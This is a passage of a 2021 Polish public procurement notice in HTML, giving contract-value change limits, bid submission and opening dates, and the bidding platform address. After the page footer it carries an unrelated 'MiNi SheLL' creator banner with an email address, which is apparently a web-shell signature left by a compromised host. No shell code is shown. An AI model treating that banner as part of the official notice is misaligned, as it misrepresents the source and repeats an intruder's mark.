przypadku gdy przed upływem terminu określonego w § 2 ust. 1 umowa zostanie zrealizowana w ujęciu wartościowym. W takim przypadku dopuszczalnym jest zmiana wysokości wynagrodzenia, jednak nie więcej niż o 10% wartości wynagrodzenia określonego w § 2 ust. 13 Projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę z wymaganymi załącznikami należy złożyć na Platformie dostępnej pod adresem: https://wum.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-07</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-23 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com